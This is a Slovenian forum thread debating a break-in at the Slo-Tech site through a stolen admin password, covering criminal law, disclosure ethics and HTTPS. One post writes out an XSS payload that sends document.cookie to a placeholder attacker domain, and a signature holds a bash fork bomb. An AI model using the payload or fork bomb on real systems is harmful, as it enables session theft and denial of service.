Novice » Varnost » Popustil najšibkejši člen Slo-Techa
DCER ::
PicNIK, po tvoji logiki:
Vdor v banko slovenija naj bo preganjan, vdor v zasebno stanovanje ali prostore društva vrtnarjev pa ne. Seveda v slednjih primerih na steno na veliko napises da nisi nič ukradel. Potem pa lastniki to za tabo pucajo.
Vdor v banko slovenija naj bo preganjan, vdor v zasebno stanovanje ali prostore društva vrtnarjev pa ne. Seveda v slednjih primerih na steno na veliko napises da nisi nič ukradel. Potem pa lastniki to za tabo pucajo.
Gizmo_X ::
Saj poznate tisto: Trust is a weakness.
Me veseli da ni bilo kakšne večje škode.
Me veseli da ni bilo kakšne večje škode.
Don't pay the BILL at the big GATES.
pivmik ::
- O škodi. Če se sedaj nebi pogovarjali o tem potem škode nebi bilo. Tako pa je. 4 ali 6 ur dela na sistemu je praktično 0 v primerjavi z škodo " dobrega imena". V dobroime pa je bilo vloženih ogooomno ur in znanja.WTF?!
Dobro ime? JA, očitno ni bilo dovolj ur in znanja, saj je nekomu uspeli prit noter. In temu primerno se je dobro ime malce zapacalo. Škoda je itak bila, lahko pa to delo vzamejo skrbniki kot izziv, ne kot žalitev in se grejo zjokati organom pregona, ker jih ne nekdo 'premagal'.
Če kraja gesla ni ne vem kaj, kaj potem tukaj sikaš in govoriš kako se je ime ST umazalo. Sm reku: Hek je hek nima veze na kakšen način, tudi če je fizično prebral bite iz RAM-a.
LP, Gregor GRE^
VolkD ::
> Hek je hek nima veze na kakšen način, tudi če je fizično prebral bite iz RAM-a.
Če bi prebral bite z rama, potem bi ga malček cenil, ker je znal vsaj to, tako ga pa enačim s đeparoši.
Če bi prebral bite z rama, potem bi ga malček cenil, ker je znal vsaj to, tako ga pa enačim s đeparoši.
Zgodovina sprememb…
- spremenil: VolkD ()
pivmik ::
DCER:
Vdor v banko JE dosti bolj preganjan kot pa vdor v stanovanje ali v prostore društva. Če bi imel društvo ključavničarjev in bi imel UBER uštiman in zavarovan prostor in bi mi nekdo vseeno uspel priti noter s prekopiranim ključem in pustil listek: "sem prišel noter - U R PWNZED", bi se nasmehnil in zamenjal ključavnico (v primeru ST stane ključavnica zanemarljivo malo).
Pa ne preveč povezovat sveta iz kjer prihajajo pizzamani z digitalnim ;) .
Vdor v banko JE dosti bolj preganjan kot pa vdor v stanovanje ali v prostore društva. Če bi imel društvo ključavničarjev in bi imel UBER uštiman in zavarovan prostor in bi mi nekdo vseeno uspel priti noter s prekopiranim ključem in pustil listek: "sem prišel noter - U R PWNZED", bi se nasmehnil in zamenjal ključavnico (v primeru ST stane ključavnica zanemarljivo malo).
Pa ne preveč povezovat sveta iz kjer prihajajo pizzamani z digitalnim ;) .
LP, Gregor GRE^
pivmik ::
VolkD: Jaz bi ga tudi še bolj cenil. V bistvu v tem primeru bi bil on CAR.
Sej možno, da se je to zgodilo. ;)
Sej možno, da se je to zgodilo. ;)
LP, Gregor GRE^
Zgodovina sprememb…
- spremenil: pivmik ()
denial ::
Naj nekdo kontaktira g. Gorazd Božiča iz SI-CERT. Najverjetneje ima določene izkušnje z računalniškimi vdori in z njimi povezanimi sodnimi postopki (kot priča/izvedenec), zato lahko poda strokovno mnenje o morebitni kazni, ter olajševalnimi/obremenilnimi okoliščinami.
SELECT finger FROM hand WHERE id=3;
DCER ::
Najprej bi najbrž pogledal če res ni kaj zmanjkalo, pa še potem bi morda sumil da je.
Dejstvo je da so šle ure v nič, nastala je škoda, kršil je zakon. Bolj kot kaj drugega se ga naj preganja zaradi vzgojnega učinka če ne drugo. Drugače si bo mislil: saj ni posledic; in nadaljeval s takim početjem.
Dejstvo je da so šle ure v nič, nastala je škoda, kršil je zakon. Bolj kot kaj drugega se ga naj preganja zaradi vzgojnega učinka če ne drugo. Drugače si bo mislil: saj ni posledic; in nadaljeval s takim početjem.
antonija ::
Sej zato pa zakon predpisuje kazni: da se tega nebi (vec) pocelo.
Statistically 3 out of 4 involved usually enjoy gang-bang experience.
ginekolog ::
se zgodi, sploh če so se vam gesla pretakala v plain textu (preko http). Potem ga je dokaj enostavno dobiti če si na istem switchu. Pa sej nima veze, glavno da ni naredil štale in zradiral foruma. (za kar bi tako verjetno rabil dostop do samega linuxa)
Divers do it deeper.
muzičar ::
Skratka ST je klonil pa na tak ali drugačen način. Še vseeno sem pa mnenja da ST admini dobro opravljajo svoje delo, ker navsezadnje je hekečkom uspelo prit tudi v Interpool tako da to ni noben poraz za admine ST-ja, le ena izkušnja več.
Vedno se najde kak, ki je boljsi. Pa tudi ce ta boljsi pomeni spretnejši, goljufaški etc.
Vedno se najde kak, ki je boljsi. Pa tudi ce ta boljsi pomeni spretnejši, goljufaški etc.
poweroff ::
Da ne boste preveč pametovali, si še enkrat oglejmo 225. člen.
(1) Kdor neupravičeno vstopi v informacijski sistem - vseeno ali vstopi z ukradenim geslom ali s "hackom" (uporabo exploita).
(2) Kdor podatke v informacijskem sistemu neupravičeno uporabi, spremeni, preslika, prenaša, uniči ali v informacijski sistem neupravičeno vnese kakšen podatek - v konkretnem primeru: spremeni nastavitve accounta (povečanje pravic) ter objavi novico.
Se kaznuje ne samo z denarno, pač pa celo z zaporno kaznijo (do dveh let). Tudi, če samo poiskusi (in mu ne uspe).
In tudi, če ni bila povzročena velika škoda. Če bi bila, potem bi bila kazen le hujša.
Samo toliko, da malce razložim ta famozni 225. člen.
(1) Kdor neupravičeno vstopi v informacijski sistem - vseeno ali vstopi z ukradenim geslom ali s "hackom" (uporabo exploita).
(2) Kdor podatke v informacijskem sistemu neupravičeno uporabi, spremeni, preslika, prenaša, uniči ali v informacijski sistem neupravičeno vnese kakšen podatek - v konkretnem primeru: spremeni nastavitve accounta (povečanje pravic) ter objavi novico.
Se kaznuje ne samo z denarno, pač pa celo z zaporno kaznijo (do dveh let). Tudi, če samo poiskusi (in mu ne uspe).
In tudi, če ni bila povzročena velika škoda. Če bi bila, potem bi bila kazen le hujša.
Samo toliko, da malce razložim ta famozni 225. člen.
sudo poweroff
asgard2.0 ::
Saj ni problem vdor če mene vprašate. Problem je to da so ST vdrl. Kaj se to pravi. Tega se pa res ne sme a. Mislim kaj se dajete. Pač mulca rajš potegnite v ekipo bo boljš kot da ga neki kaznujete. EGO vam je prizadel verjetno vas to najbolj boli. No sej bomo vidli če bom dobu persona rudis
Šiht, CPU , Hrana, Spanje, Šiht ....
poweroff ::
Zakaj že bi nekoga, ki zna verjetno le passsword snifferja poganjat sprejel v ekipo, ki zahteva obsežna in specifična znanja?
sudo poweroff
hruske ::
Hej, ce se clovek hoce igrat, naj si doma postavi en red hat in se naj znasa nad njim. Jaz pa rad pridem na slo-tech, ker je tu dobra klapa, vedno pripravljena za flejmanje.
Verjamem, da je Primoz se vedno dovolj sposoben in da ima streznik nastavljen tako, kot mogoce se najvec dva cloveka, ki obiskujeta to stran, tako da do vecjega vdora ni moglo priti.
Verjamem, da je Primoz se vedno dovolj sposoben in da ima streznik nastavljen tako, kot mogoce se najvec dva cloveka, ki obiskujeta to stran, tako da do vecjega vdora ni moglo priti.
Kalkulator nove omrežnine 2024 - https://omreznina.karlas.si/Kalkulator
VolkD ::
> Saj ni problem vdor če mene vprašate. Problem je to da so ST vdrl.
Ni res. Isto bi bilo, če bi meni vdrl. Načeloma sem za preganjanje tega. In ST ni nobena izjema !
Ni res. Isto bi bilo, če bi meni vdrl. Načeloma sem za preganjanje tega. In ST ni nobena izjema !
Preden zaspiš zapri oči. Preden zapreš oči, ustavi avto.
mspiller ::
Po takojšnjem ukrepanju se je ugotovilo, da je enemu od petih uporabnikov Slo-Techa z največ pravicami na za zdaj še neznan način "ušlo" geslo.
Zakaj neznan??? Ce je uporabil XSS nacina napada verjetno sploh ni dobil administratorjevo geslo, ampak je enostavno ukradel njegov cookie.
To se pravi je moral narediti enega dummy userja, s katerim je postal en komentar, post, prijavo v stilu :
< script >document.location='http://enaXXXdomena/cookie.php? '%20+document.cookie< /cript > (obstaja 1001 nacin kako embedat js v page)
Potem pa je nic hudega slutec administrator pogledal post (komentar, whatever) in poslal svoj cookie na en drug server (od evil hakerja).
Ena moznost je da si server zapomni uporabnikov ip in ga primerja z vsakim requestom (1 cookie == 1 ip). Samo potem odpade samodejna prijava.
Par linkov v kaj vse se lohka skrije javascript: http://www.cgisecurity.com/articles/xss..., http://www.technicalinfo.net/papers/CSS... http://ha.ckers.org/xss.html (ta zadnji link ti se pove kaj bo delalo pod katerim browserjem) Pa ni hudic da ne bi ker nacil delal tut na slo-techu.
stuff ::
HAM bravo sma istega mnenja
Jaz mu cestitam, in pohvalim, ker ni naredil nobene skode, ampak
je le opozoril na nekaj.
Kako pa je password dobil pa tk sami vedo ce ne pa bojo kmal zvedl!Passworde je pac treba mirkat!
Pa brez zamere
Jaz mu cestitam, in pohvalim, ker ni naredil nobene skode, ampak
je le opozoril na nekaj.
Kako pa je password dobil pa tk sami vedo ce ne pa bojo kmal zvedl!Passworde je pac treba mirkat!
Pa brez zamere
Bakunin ::
..., ker ni naredil nobene skode, ampak
"brez zamere", ce ti recem da si len, ampak lahko bi prebral ze napisano.
stuff ::
"brez zamere", ce ti recem da si len, ampak lahko bi prebral ze napisano.
Ja sem vse prebral ce pa je skoda to da je dela pol par ur pa gledi koker mislis, boljse danes par ur kot pa vse fuč
Ja sem vse prebral ce pa je skoda to da je dela pol par ur pa gledi koker mislis, boljse danes par ur kot pa vse fuč
stuff ::
Si bojo eni vsaj zapolnal da ni vse lepo in prav tudi meni ni vsec da se je ST to zgodil in da so imeli zato delo "skodo" al kako bi ti temu reku.Vendar naj od zdaj naprej zato bolj čuvajo, kar pa ni "skoda" ampak delo.Bilo je upozorjeno, s tem pa so vedno posledice taksne ali drugacne.
64202 ::
> obstaja 1001 nacin kako embedat js v page
Ako se ne motim, je dovolj pravilno escapanje nekaj znakov in vseh 1001 nacinov gre po vodi. Edina mozna tezava je, da slo-tech dopusca tudi slike, kjer pa IE pusti izvajat JS...
Ako se ne motim, je dovolj pravilno escapanje nekaj znakov in vseh 1001 nacinov gre po vodi. Edina mozna tezava je, da slo-tech dopusca tudi slike, kjer pa IE pusti izvajat JS...
I am NaN, I am a free man!
Microsoft ::
Bakunin
Poleg tega to ni bilo hekanje, ampak zelo beden "social engineering" (najdeno geslo).
Tole se pa zelo zelo motis. SE je ena izmet stvari, ki se jih lahko zelo bojis, ce delas na podrocju varnosti omrezji.
Primoz
Ker smo se iz tega nekaj naučili, je od včeraj za vse uporabnike z malo več pravicami obvezna uporaba HTTPSa (drugače jim račun ne deluje).
Tole me ultra preseneca, da ni bilo ze prej tako.
VolkD
Kraja gesla ni nekaj kar bi bilo ne vem kaj.
Kaka neumnost!!!
Sicer pa glede vdorov. To se dogaja dnevno. Danes tukaj, jutri tam. Ampak, da bi zdej kar vsakega sodno preganjal, nekako ne gre. Dosti bolj ucinkovito je to, da sam poskrbis za varnost. HTTPS je ze dobra ideja, zamenjava gesel z certifikati (glede na to, da imate CA), tudi ne bi bila slaba. Potem ne vem, zakaj ne morete omejit prijavo na dolocen IP?
by Miha
Poleg tega to ni bilo hekanje, ampak zelo beden "social engineering" (najdeno geslo).
Tole se pa zelo zelo motis. SE je ena izmet stvari, ki se jih lahko zelo bojis, ce delas na podrocju varnosti omrezji.
Primoz
Ker smo se iz tega nekaj naučili, je od včeraj za vse uporabnike z malo več pravicami obvezna uporaba HTTPSa (drugače jim račun ne deluje).
Tole me ultra preseneca, da ni bilo ze prej tako.
VolkD
Kraja gesla ni nekaj kar bi bilo ne vem kaj.
Kaka neumnost!!!
Sicer pa glede vdorov. To se dogaja dnevno. Danes tukaj, jutri tam. Ampak, da bi zdej kar vsakega sodno preganjal, nekako ne gre. Dosti bolj ucinkovito je to, da sam poskrbis za varnost. HTTPS je ze dobra ideja, zamenjava gesel z certifikati (glede na to, da imate CA), tudi ne bi bila slaba. Potem ne vem, zakaj ne morete omejit prijavo na dolocen IP?
by Miha
s8eqaWrumatu*h-+r5wre3$ev_pheNeyut#VUbraS@e2$u5ESwE67&uhukuCh3pr
hruske ::
Hehe, ker po pravilih ne smes imet dveh racunov. Dvojnih pravil, ene za admine, druge pa za uporabnike pa pač ne moreš imet.
Oz. drug odgovor: ker nima smisla toliko omejevat stvari, saj potem ni več tolikšne fleksibilnosti.
Oz. drug odgovor: ker nima smisla toliko omejevat stvari, saj potem ni več tolikšne fleksibilnosti.
Kalkulator nove omrežnine 2024 - https://omreznina.karlas.si/Kalkulator
Microsoft ::
Ok, pol pa takole. Imas isti account in si admin. Ce se prijavis iz domacega IPja, dobis dodeljene admin pravice, v nasprotnem primeru si navaden uporabnik.
by Miha
by Miha
s8eqaWrumatu*h-+r5wre3$ev_pheNeyut#VUbraS@e2$u5ESwE67&uhukuCh3pr
mtosev ::
Je bil človek pameten in uporabljal proxy al je bil glup pa ni?
Core i9 10900X, ASUS Prime X299 Edition 30, 32GB 4x8 3600Mhz G.skill, CM H500M,
ASUS ROG Strix RTX 2080 Super, Samsung 970 PRO, UltraSharp UP3017, Win 11 Pro,
Enermax Platimax 1700W | moj oče darko 1960-2016, moj labradorec max 2002-2013
ASUS ROG Strix RTX 2080 Super, Samsung 970 PRO, UltraSharp UP3017, Win 11 Pro,
Enermax Platimax 1700W | moj oče darko 1960-2016, moj labradorec max 2002-2013
Microsoft ::
AndrejS, sej to bi veljalo samo za tistih par (pet?) uporabnikov.
by Miha
by Miha
s8eqaWrumatu*h-+r5wre3$ev_pheNeyut#VUbraS@e2$u5ESwE67&uhukuCh3pr
Ziga Dolhar ::
mspiller:
> Zakaj neznan??? Ce je uporabil XSS nacina napada verjetno sploh ni dobil administratorjevo geslo, ampak je enostavno ukradel njegov cookie.
Načeloma je razčiščeno, da NI šlo za XSS metodo. To izhaja takoj iz drugega naslednjega stavka :-).
Glede primerjav med "umorom" in "neupravičenim vstopom v informacijski sistem": Kazenski zakonik varuje različne kazenskopravne dobrine. Inkriminacija umora tako pred neupravičenimi posegi varuje človekovo telo in življenje, 225. člen pa (v okviru kaznivih dejanj, ki ščitijo "premoženje") integriteto (celovitost, neokrnjenost) informacijskih sistemov. Pri tem gre lahko za posebno (specifičnejšo) vrsto "poškodovanja tuje stvari". Že sama primerjava z 242. členom, ki inkriminira "vdor v informacijski sistem" in je (izrečno) omejen na varovanje gospodarskih interesov [torej se vdor zgodi pri gospodarskem poslovanju], daje argument za dejstvo, da 225. člen inkriminira tudi "negospodarske" sisteme, torej take, ki jih nekateri sodelujoči v tej temi označujete za domala varstva nevredne. Res pa je, da so ti sistemi manj varovani od "gospodarskih", kar se odraža tudi v sami kazni.
Vendar nižja kazen nikakor ne da argumenta, da gre potem taka dejanja "manj resno preganjat". Intenzivnost je namreč vsebovana že v [milejši] kazni. Ravno eksplicitna določenost za pregon tudi tovrstnih "milejših" dejanj pa je argument za primerljivo enako intenziven pregon.
Glede morebitne bagatelnosti dejanja gre opozorit še na dejstvo, da je že sam poskus kaznivega dejanja iz 2. odstavka (vnos, uporaba, preslikava podatkov ...) kazniv, čeprav je za kaznivost poskusa sicer splošno potrebna hujša zagrožena kazen (3 let), medtem ko je za to dejanje predpisana kazen do 2 let. Zakonodajalec očitno priznava pomembnost nekomprimiranosti informacijskih sistemov.
Pri tem gre opozorit tudi na storilčev odnos do dejanja. Iz dejstva, da kljub temu, da ima svoje vstopne parametre (uporabniško ime, geslo), vseeno uporabi parametre nekoga drugega, čeprav se zaradi poznavanja sistema mora zavedat, da je to nedopustno, nikakor ne morem sestavit pomislekov o kakršnikoli "zmoti" storilca oz. drugem dejstvu, ki bi izključeval njegov direktni (če ne že obarvani) naklep. Glede na to, da z dejanjem po "vstopu" v sistem ni prenehal, ampak je začel izvrševat še znake kvalificirane oblike (torej vnos in sprememba podatkov), se takoj prične postavljat vprašanje njegove "dobronamernosti".
(Tega vprašanja pa ni več po tem, ko objavi novico s precej bombastično sliko in lažnimi navedbami. Še posebej, ko mu je novica DVAKRAT brisana, a jo še dodatno dvakrat ponovno objavi. Vandalizem.)
> Zakaj neznan??? Ce je uporabil XSS nacina napada verjetno sploh ni dobil administratorjevo geslo, ampak je enostavno ukradel njegov cookie.
Načeloma je razčiščeno, da NI šlo za XSS metodo. To izhaja takoj iz drugega naslednjega stavka :-).
Glede primerjav med "umorom" in "neupravičenim vstopom v informacijski sistem": Kazenski zakonik varuje različne kazenskopravne dobrine. Inkriminacija umora tako pred neupravičenimi posegi varuje človekovo telo in življenje, 225. člen pa (v okviru kaznivih dejanj, ki ščitijo "premoženje") integriteto (celovitost, neokrnjenost) informacijskih sistemov. Pri tem gre lahko za posebno (specifičnejšo) vrsto "poškodovanja tuje stvari". Že sama primerjava z 242. členom, ki inkriminira "vdor v informacijski sistem" in je (izrečno) omejen na varovanje gospodarskih interesov [torej se vdor zgodi pri gospodarskem poslovanju], daje argument za dejstvo, da 225. člen inkriminira tudi "negospodarske" sisteme, torej take, ki jih nekateri sodelujoči v tej temi označujete za domala varstva nevredne. Res pa je, da so ti sistemi manj varovani od "gospodarskih", kar se odraža tudi v sami kazni.
Vendar nižja kazen nikakor ne da argumenta, da gre potem taka dejanja "manj resno preganjat". Intenzivnost je namreč vsebovana že v [milejši] kazni. Ravno eksplicitna določenost za pregon tudi tovrstnih "milejših" dejanj pa je argument za primerljivo enako intenziven pregon.
Glede morebitne bagatelnosti dejanja gre opozorit še na dejstvo, da je že sam poskus kaznivega dejanja iz 2. odstavka (vnos, uporaba, preslikava podatkov ...) kazniv, čeprav je za kaznivost poskusa sicer splošno potrebna hujša zagrožena kazen (3 let), medtem ko je za to dejanje predpisana kazen do 2 let. Zakonodajalec očitno priznava pomembnost nekomprimiranosti informacijskih sistemov.
Pri tem gre opozorit tudi na storilčev odnos do dejanja. Iz dejstva, da kljub temu, da ima svoje vstopne parametre (uporabniško ime, geslo), vseeno uporabi parametre nekoga drugega, čeprav se zaradi poznavanja sistema mora zavedat, da je to nedopustno, nikakor ne morem sestavit pomislekov o kakršnikoli "zmoti" storilca oz. drugem dejstvu, ki bi izključeval njegov direktni (če ne že obarvani) naklep. Glede na to, da z dejanjem po "vstopu" v sistem ni prenehal, ampak je začel izvrševat še znake kvalificirane oblike (torej vnos in sprememba podatkov), se takoj prične postavljat vprašanje njegove "dobronamernosti".
(Tega vprašanja pa ni več po tem, ko objavi novico s precej bombastično sliko in lažnimi navedbami. Še posebej, ko mu je novica DVAKRAT brisana, a jo še dodatno dvakrat ponovno objavi. Vandalizem.)
https://dolhar.si/
R33D3M33R ::
Ko sem videl novico se mi je na usta prikradel zloben nasmešek. V temah sem že videl kako so ljudje varnost slo-techa kovali v nebesa. No, sedaj so padli na trda realna tla.
Vidim da bi ga radi kaznovali, čeprav ni naredil nič in je le razkril luknjo. Sedaj jo boste lahko popravili. Si predstavljate, da je ne bi razkril in bi se našel kdo, ki bi začel brisati vse povprek? Opravil je dobro delo pa bi ga radi kaznovali. Le zakaj? Zato ker je očitno tip močno prizadel vaš ego. To je vzrok. .
Vidim da bi ga radi kaznovali, čeprav ni naredil nič in je le razkril luknjo. Sedaj jo boste lahko popravili. Si predstavljate, da je ne bi razkril in bi se našel kdo, ki bi začel brisati vse povprek? Opravil je dobro delo pa bi ga radi kaznovali. Le zakaj? Zato ker je očitno tip močno prizadel vaš ego. To je vzrok. .
Moja domača stran: http://andrej.mernik.eu
Na spletu že od junija 2002 ;)
:(){ :|:& };:
Na spletu že od junija 2002 ;)
:(){ :|:& };:
BluPhenix ::
Oh cheesus..
Luknja... In kako bodo popravili to luknjo? Bodo uvedli login brez gesla, ali bodo naredili, da se ne moraš logirat?
Ni šlo za varnostno luknjo v sistemu (po sedaj napisanem od adminov), ampak je šlo za nelegitimen vstop v sistem z uporabo osebnih podatkov nekega 3jega uporabnika. Edina luknja je lahko ta, da ta admin ni dovolj skrbno čuval gesla. Ampak to še ne pomeni, da je luknja v sistemu. Admini niso del sistema, so le njegovi upravitelji.
Še vedno ni jasno... kako lahko napišeš, da ni naredil nič? Objavil je izmišljeno novico, zaradi njega veliko ljudi ni moglo dostopati do strani, ustvaril je nekaj ur dela adminom, v končni fazi je lahko tudi povzročil izpad dobička zaradi nezmožnosti prikazovanja oglasov. Če nebi naredil nič, nebi imeli o čem govoriti, kot je nekdo že povedal. Na to temo, je pa že precejšnje število odgovorov, torej to, da ni naredil nič ne moreš reči. Lahko poskušaš zagovarjati edino, da ni naredil nič takega, kar bi ogrozilo kakšno življenje...
_dobro_delo_ bi bilo to, da če bi našel geslo, da bi pisal adminu, ki je geslo "zgubil" in mu to povedal. To bi bilo dobro delo. Ampak on je hotel biti heroj, hotel je, da folk ve za njega in hotel si je pridobiti slavo. To ni dobro delo, to je usurpacija, izkoriščenje blatenja tujega imena za izboljšanje svojega.
Da ni blatil imena ST? Seveda ga je, s tem, ko je govoril, da je udrl zaradi pomankljivosti v Xss. S tem je imliciral, da ima ST to slabo rešeno, kar pa glede na to, da ni prišel tako noter, ne more vedeti. Torej je nekaj špekuliral. Seveda, če bi napisal, da je ukradel geslo nebi bil pol toliko zanimiv.
Vse zgoraj napisano seveda velja če drži tisto, kar so pisali admini, o kraji gesla.
Luknja... In kako bodo popravili to luknjo? Bodo uvedli login brez gesla, ali bodo naredili, da se ne moraš logirat?
Ni šlo za varnostno luknjo v sistemu (po sedaj napisanem od adminov), ampak je šlo za nelegitimen vstop v sistem z uporabo osebnih podatkov nekega 3jega uporabnika. Edina luknja je lahko ta, da ta admin ni dovolj skrbno čuval gesla. Ampak to še ne pomeni, da je luknja v sistemu. Admini niso del sistema, so le njegovi upravitelji.
Še vedno ni jasno... kako lahko napišeš, da ni naredil nič? Objavil je izmišljeno novico, zaradi njega veliko ljudi ni moglo dostopati do strani, ustvaril je nekaj ur dela adminom, v končni fazi je lahko tudi povzročil izpad dobička zaradi nezmožnosti prikazovanja oglasov. Če nebi naredil nič, nebi imeli o čem govoriti, kot je nekdo že povedal. Na to temo, je pa že precejšnje število odgovorov, torej to, da ni naredil nič ne moreš reči. Lahko poskušaš zagovarjati edino, da ni naredil nič takega, kar bi ogrozilo kakšno življenje...
_dobro_delo_ bi bilo to, da če bi našel geslo, da bi pisal adminu, ki je geslo "zgubil" in mu to povedal. To bi bilo dobro delo. Ampak on je hotel biti heroj, hotel je, da folk ve za njega in hotel si je pridobiti slavo. To ni dobro delo, to je usurpacija, izkoriščenje blatenja tujega imena za izboljšanje svojega.
Da ni blatil imena ST? Seveda ga je, s tem, ko je govoril, da je udrl zaradi pomankljivosti v Xss. S tem je imliciral, da ima ST to slabo rešeno, kar pa glede na to, da ni prišel tako noter, ne more vedeti. Torej je nekaj špekuliral. Seveda, če bi napisal, da je ukradel geslo nebi bil pol toliko zanimiv.
Vse zgoraj napisano seveda velja če drži tisto, kar so pisali admini, o kraji gesla.
Podpisa ni več, ker so me poskušali asimilirati.
Microsoft ::
Kaznovanje taksnih stvari je pravilno. Ampak v okviru nekih normalnih pravil, brez kaksnih "obesil bi ga za jajce" in podobno. Recimo, denarna kazen 100kSIT bi bila cisto vredu.
Je pa drugo, da je kaj takega malo tezje pricakovati. Vredu, da se, amapk taksnih poskusov napada, ter nekaj uspelih poskusov, kot je bil tale, je na miljone. Tezko je to spravit skozi v nekem doglednem casu.
Ker je dokaj nerealno pricakovati, da speljes zgodbo poskusa vdora pod streho. Recimo, primer poskusa vdora je tole. Ampak, pricakovati da bo tozba zaradi poskusa vdora prisla kdaj do konca, je vsaj po moje nerealno.
BluPhenix, kot varnostno luknjo v sistemu se, vsaj po moje, lahko smatra do pred kratkim neobvezna uporaba HTTPSja za prijavo v sistem za admine.
by Miha
Je pa drugo, da je kaj takega malo tezje pricakovati. Vredu, da se, amapk taksnih poskusov napada, ter nekaj uspelih poskusov, kot je bil tale, je na miljone. Tezko je to spravit skozi v nekem doglednem casu.
Ker je dokaj nerealno pricakovati, da speljes zgodbo poskusa vdora pod streho. Recimo, primer poskusa vdora je tole. Ampak, pricakovati da bo tozba zaradi poskusa vdora prisla kdaj do konca, je vsaj po moje nerealno.
BluPhenix, kot varnostno luknjo v sistemu se, vsaj po moje, lahko smatra do pred kratkim neobvezna uporaba HTTPSja za prijavo v sistem za admine.
by Miha
s8eqaWrumatu*h-+r5wre3$ev_pheNeyut#VUbraS@e2$u5ESwE67&uhukuCh3pr
Zgodovina sprememb…
- spremenil: Microsoft ()
TekO ::
Jst se popolnoma strinjam s PicNiKom..
Tole vsekakor je kaznivo dejanje, tle ni nobenga dvoma. Ampak je heker oz. "heker" kakor ga pač želite smatrati, uporabil najbolj milo obliko, ter vam sporočil da se da priti noter. Mogoče malo zbudil admine:) Pa ne morete primerjati vdor v nek ST, z vdorom v banko ipd. In moralno se mi ne zdi nič narobe, razen tega da je adminom povzročil nekaj ur dela, hkrati jih je pa opozoril na ranljivost.
Kapo dol.
Sicer pa this things happen. Še wedno pa sm prepričan da je ST z admini na čelu varen portal;)
Tole vsekakor je kaznivo dejanje, tle ni nobenga dvoma. Ampak je heker oz. "heker" kakor ga pač želite smatrati, uporabil najbolj milo obliko, ter vam sporočil da se da priti noter. Mogoče malo zbudil admine:) Pa ne morete primerjati vdor v nek ST, z vdorom v banko ipd. In moralno se mi ne zdi nič narobe, razen tega da je adminom povzročil nekaj ur dela, hkrati jih je pa opozoril na ranljivost.
Kapo dol.
Sicer pa this things happen. Še wedno pa sm prepričan da je ST z admini na čelu varen portal;)
Ideas are bulletproof.
mtosev ::
Jaz predlagam za tipa vzamete za svetovalca za varnost.
Core i9 10900X, ASUS Prime X299 Edition 30, 32GB 4x8 3600Mhz G.skill, CM H500M,
ASUS ROG Strix RTX 2080 Super, Samsung 970 PRO, UltraSharp UP3017, Win 11 Pro,
Enermax Platimax 1700W | moj oče darko 1960-2016, moj labradorec max 2002-2013
ASUS ROG Strix RTX 2080 Super, Samsung 970 PRO, UltraSharp UP3017, Win 11 Pro,
Enermax Platimax 1700W | moj oče darko 1960-2016, moj labradorec max 2002-2013
alum ::
Mater ste glupi (pardon izrazu).
Vkradel je geslo. Našel je geslo. Videl je geslo. Nekaj od tega. Naj vam prosim potegne.
[Namenjeno raznim R33D3M33R(om), TekO(tom) in mtosev(om), ki še zdaj niso prebrali, da ni šlo za varnostno luknjo.]
Brez zamere.
Vkradel je geslo. Našel je geslo. Videl je geslo. Nekaj od tega. Naj vam prosim potegne.
[Namenjeno raznim R33D3M33R(om), TekO(tom) in mtosev(om), ki še zdaj niso prebrali, da ni šlo za varnostno luknjo.]
Brez zamere.
Microsoft ::
Tu je zelo pomembno, na kak nacin je prisel do gesla!
by Miha
by Miha
s8eqaWrumatu*h-+r5wre3$ev_pheNeyut#VUbraS@e2$u5ESwE67&uhukuCh3pr
Microsoft ::
Ni mi jasno, na kak nacin je prisel do gesla. In to je zelo pomembno.
by Miha
by Miha
s8eqaWrumatu*h-+r5wre3$ev_pheNeyut#VUbraS@e2$u5ESwE67&uhukuCh3pr
VolkD ::
Pomembno je le v toliko, da se ve ali je šlo za malomarnost enega od petih, ali pa le ta na to ni mogel vplivati.
Konec koncev te noben sistem ne reši, če ti je nekdo našraufal keyloger.
Konec koncev te noben sistem ne reši, če ti je nekdo našraufal keyloger.
Preden zaspiš zapri oči. Preden zapreš oči, ustavi avto.
Microsoft ::
Tako je. Ne ve se ali je nekdo prebral geslo iz enega listka prileplenega na monitor ali pa je vdrl v nek sistem in od tam pobral geslo. Ali pa kaj tretjega. In razlike med temi nacino so velike.
by Miha
by Miha
s8eqaWrumatu*h-+r5wre3$ev_pheNeyut#VUbraS@e2$u5ESwE67&uhukuCh3pr
Zgodovina sprememb…
- spremenil: Microsoft ()
Matek ::
Imas prav, Microsoft. Ampak nobeno od tega ni varnostna luknja v Slo-Techu. Edina razlika med temi nacini je, da ti povedo, ali je user, ki so mu ukradli geslo, tega zapravil po lastni neumnosti, ali pa so ga ukradli zaradi katere od lukenj v njegovem operacijskem sistemu/browserju.
Bolje ispasti glup nego iz aviona.
Microsoft ::
No, kot sem ze visje napisal, je do sedaj (in po moje) bila edina pomankljivost ta, da HTTPS ni bil obvezen za one z veliko privilegiji. Mogoce bi to resilo problem, ce je nekdo prestregel geslo, ki je sel preko HTTPja.
by Miha
by Miha
s8eqaWrumatu*h-+r5wre3$ev_pheNeyut#VUbraS@e2$u5ESwE67&uhukuCh3pr
sverde21 ::
Jao keri komentarji... grem stavt da se dle tale trenutek on k je vdru vala po tleh pa smeji temle komentarjem na ves glas ker tud če ga izsledite, mu ne boste mogl nič (če je pameten je že zdavni naredu popolni format diska z 32 kratnim prepisovanjem z naključnimi podatki (NSA stuff)).
Sicer pa admini ne vem zakaj zanikate luknje na S-T, ker obstajajo in XSS je možen na 1000 in 1 način, tud na takšne nečine, da noben log ne zabeleži kaj sumlivega
Kar se pa njegovega dela tiče, pravite da je imel dostop samo nekaj malega časa... hmm really vi samo veste da ga je imel nekaj malega, prej pa je lahko on že ceu server na disk pretoču, zapeku na en ali več DVDjev, jih zakopal za bajto in bo počaku da se prah po temle poleže, nato bo pa začel na veliko crackati md5 gesla
Sicer pa admini ne vem zakaj zanikate luknje na S-T, ker obstajajo in XSS je možen na 1000 in 1 način, tud na takšne nečine, da noben log ne zabeleži kaj sumlivega
Kar se pa njegovega dela tiče, pravite da je imel dostop samo nekaj malega časa... hmm really vi samo veste da ga je imel nekaj malega, prej pa je lahko on že ceu server na disk pretoču, zapeku na en ali več DVDjev, jih zakopal za bajto in bo počaku da se prah po temle poleže, nato bo pa začel na veliko crackati md5 gesla
<?php echo `w`; ?>
Microsoft ::
Totalne neumosti govoris. V vsakem odstavku. Sploh zadnjem.
by Miha
by Miha
s8eqaWrumatu*h-+r5wre3$ev_pheNeyut#VUbraS@e2$u5ESwE67&uhukuCh3pr
grex ::
Vsi, ki dajete komentarje, da je tipa ustrezno in edino pravilno kaznovati.
